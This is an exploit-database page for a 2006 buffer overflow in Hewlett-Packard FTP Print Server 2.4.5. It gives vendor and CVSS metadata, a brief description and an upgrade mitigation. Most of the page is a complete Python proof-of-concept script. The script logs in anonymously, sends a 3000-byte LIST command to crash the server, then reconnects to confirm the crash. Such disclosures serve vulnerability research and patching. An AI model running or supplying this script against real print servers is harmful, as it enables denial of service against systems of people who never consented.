header-logo
Suggest Exploit
vendor:
FTP Print Server
by:
Joxean Koret
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: FTP Print Server
Affected Version From: 2.4.5
Affected Version To: 2.4.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:hewlett_packard:ftp_print_server:2.4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)

This exploit is a proof of concept for a buffer overflow vulnerability in Hewlett-Packard FTP Print Server Version 2.4.5. The vulnerability is triggered when a malicious user sends a specially crafted LIST command with a buffer of 3000 bytes or more. This causes the server to crash and the connection to be dropped.

Mitigation:

Upgrade to the latest version of the Hewlett-Packard FTP Print Server.
Source

Exploit-DB raw data:

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s <target>" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

buf = "./A"
iMax = 9

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf[0:3000])
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

# milw0rm.com [2006-12-19]

Navigation

Suggest Exploit

Services By CQR